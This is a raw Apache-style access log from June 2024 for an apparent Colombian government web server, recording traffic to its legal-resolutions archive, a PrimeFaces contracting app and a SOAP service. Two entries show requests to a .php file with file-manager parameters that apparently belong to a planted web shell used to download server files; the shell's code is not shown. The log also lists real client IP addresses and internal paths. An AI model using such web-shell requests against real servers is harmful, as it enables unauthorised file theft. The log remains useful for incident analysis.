47.128.52.182 - - [16/Jun/2024:13:04:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs&f=customize-controls.min.js&ft=download HTTP/1.1" 200 36378
201.245.192.253 - - [16/Jun/2024:13:05:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:13:05:45 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:13:06:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:13:06:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:13:07:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
95.217.186.46 - - [16/Jun/2024:13:07:56 -0500] "GET /IsolucionSDA/Content/bootstrap/bootstrap.css HTTP/1.1" 200 172657
201.245.192.253 - - [16/Jun/2024:13:08:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:13:08:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:13:06:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.120.44 - - [16/Jun/2024:13:08:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Csig%5CGesti%F3n+Ambiental%5C&f=126PM03-PR27.pdf&ft=download&white=1 HTTP/1.1" 200 198326
161.18.222.72 - - [16/Jun/2024:13:09:13 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:13 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:13 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:13 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:13 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:13 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:13 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:13 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:14 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:15 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:16 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:16 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:16 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:16 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:16 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:16 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 302 -
161.18.222.72 - - [16/Jun/2024:13:09:16 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
161.18.222.72 - - [16/Jun/2024:13:09:20 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
161.18.222.72 - - [16/Jun/2024:13:09:20 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:09:21 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12411
161.18.222.72 - - [16/Jun/2024:13:09:21 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:09:21 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
161.18.222.72 - - [16/Jun/2024:13:09:21 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:09:21 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
161.18.222.72 - - [16/Jun/2024:13:09:21 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
161.18.222.72 - - [16/Jun/2024:13:09:21 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
161.18.222.72 - - [16/Jun/2024:13:09:21 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:09:21 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:09:21 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:09:21 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:09:21 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
161.18.222.72 - - [16/Jun/2024:13:09:22 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
161.18.222.72 - - [16/Jun/2024:13:09:22 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
161.18.222.72 - - [16/Jun/2024:13:09:22 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
172.22.2.4 - - [16/Jun/2024:13:07:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [16/Jun/2024:13:09:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
161.18.222.72 - - [16/Jun/2024:13:09:33 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16289
161.18.222.72 - - [16/Jun/2024:13:09:34 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
161.18.222.72 - - [16/Jun/2024:13:09:34 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
161.18.222.72 - - [16/Jun/2024:13:09:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:09:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:09:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:09:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:09:35 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 200 1505
161.18.222.72 - - [16/Jun/2024:13:09:35 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
161.18.222.72 - - [16/Jun/2024:13:09:35 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:09:35 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
161.18.222.72 - - [16/Jun/2024:13:09:35 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
161.18.222.72 - - [16/Jun/2024:13:09:53 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
161.18.222.72 - - [16/Jun/2024:13:09:53 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1471
161.18.222.72 - - [16/Jun/2024:13:09:54 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 34535
161.18.222.72 - - [16/Jun/2024:13:09:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:09:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:09:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:09:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:09:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
161.18.222.72 - - [16/Jun/2024:13:09:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 111404
161.18.222.72 - - [16/Jun/2024:13:10:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:10:02 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:10:02 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:10:02 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:10:02 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
161.18.222.72 - - [16/Jun/2024:13:10:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 19424
161.18.222.72 - - [16/Jun/2024:13:10:08 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:10:08 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:10:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:10:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:10:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
161.18.222.72 - - [16/Jun/2024:13:10:10 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 200 1330
161.18.222.72 - - [16/Jun/2024:13:10:10 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:10:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:10:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:10:10 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
201.245.192.253 - - [16/Jun/2024:13:10:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
161.18.222.72 - - [16/Jun/2024:13:10:52 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:10:52 -0500] "POST /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 200 111404
161.18.222.72 - - [16/Jun/2024:13:10:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:10:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:10:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:10:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:10:53 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
172.22.2.4 - - [16/Jun/2024:13:10:53 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
186.82.99.39 - - [16/Jun/2024:13:10:57 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
186.82.99.39 - - [16/Jun/2024:13:11:00 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2020%2F HTTP/1.1" 200 333353
139.162.87.5 - - [16/Jun/2024:13:11:13 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
186.82.99.39 - - [16/Jun/2024:13:11:20 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2020%2F HTTP/1.1" 200 12235
186.82.99.39 - - [16/Jun/2024:13:11:21 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2020%2F HTTP/1.1" 200 333353
201.245.192.253 - - [16/Jun/2024:13:11:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.82.99.39 - - [16/Jun/2024:13:11:26 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2020%2F HTTP/1.1" 200 171470
186.82.99.39 - - [16/Jun/2024:13:11:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/0019.pdf HTTP/1.1" 200 366507
201.245.192.253 - - [16/Jun/2024:13:11:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
186.82.99.39 - - [16/Jun/2024:13:12:09 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 268317
186.82.99.39 - - [16/Jun/2024:13:12:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2330.pdf HTTP/1.1" 200 360913
201.245.192.253 - - [16/Jun/2024:13:12:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
161.18.222.72 - - [16/Jun/2024:13:12:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 19424
161.18.222.72 - - [16/Jun/2024:13:12:30 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:30 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:30 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:30 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:30 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:30 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:30 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:30 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:30 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:30 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:40 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:39 -0500] "POST /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 200 157965
161.18.222.72 - - [16/Jun/2024:13:12:40 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:40 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
161.18.222.72 - - [16/Jun/2024:13:12:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 19424
161.18.222.72 - - [16/Jun/2024:13:12:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:44 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:13:12:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
